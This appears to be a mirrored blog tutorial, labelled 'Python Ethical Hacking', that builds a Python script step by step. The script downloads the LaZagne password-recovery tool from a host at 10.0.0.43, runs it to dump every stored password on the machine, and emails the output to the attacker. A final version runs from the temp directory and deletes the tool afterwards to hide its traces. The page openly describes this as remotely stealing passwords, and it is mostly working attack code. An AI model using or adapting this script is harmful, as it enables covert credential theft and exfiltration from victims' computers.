zoukankan      html  css  js  c++  java
  • Python Ethical Hacking

    DOWNLOAD_FILE

    • Download files on a system.
    • Once packaged properly will work on all operating systems.
    • Simple but powerfull.

    Can be used in many situations:

    • download _file + execute_command = download_and_execute
    • download_file + execute_and_report = download_execute_and_report
    • ...etc
    #!/usr/bin/env python
    import requests
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")

     DOWNLOAD_EXECUTE_AND_REPORT

    • Download files on a system.
    • Execute a command that uses this file.
    • Report results in our email.
    • Cross multi-Platform!!

    Ex: remotely steal all stored passwords on a computer!

    Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne

    lazagne.exe --help

     Use the following command to find all the passwords in the current system.

     lazagne.exe all

     Steal saved passwords remotely

    #!/usr/bin/env python
    import requests
    import smtplib
    import subprocess
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    def send_mail(email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()
    
    
    download("http://10.0.0.43/evil-files/lazagne.exe")
    result = subprocess.check_output("lazagne.exe all", shell=True)
    print(result.decode())
    send_mail("aaaa@gmail.com", "1111111", result)

    Optimize the Python Script - Interacting with the file system. The evil file will be downloaded in the temp directory and removed after executed. 

    #!/usr/bin/env python
    import os
    import smtplib
    import subprocess
    import requests
    import tempfile
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    def send_mail(email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()
    
    
    temp_directory = tempfile.gettempdir()
    os.chdir(temp_directory)
    download("http://10.0.0.43/evil-files/lazagne.exe")
    result = subprocess.check_output("lazagne.exe all", shell=True)
    print(result.decode())
    send_mail("aaaa@gmail.com", "1111111", result)
    os.remove("lazagne.exe")
    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    键盘的出现于隐藏(解决键盘弹出时会覆盖文本框的问题,代码实现)
    UI入门指引
    OC 面试问题汇总
    通知、block
    协议和代理
    plist文件、NSUserDefault 对文件进行存储的类、json格式解析
    归档NSKeyedArchiver解归档NSKeyedUnarchiver与文件管理类NSFileManager (文件操作)
    Foundation框架下的常用类:NSNumber、NSDate、NSCalendar、NSDateFormatter、NSNull、NSKeyedArchiver
    选择器
    内存管理
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11616187.html
Copyright © 2011-2022 走看看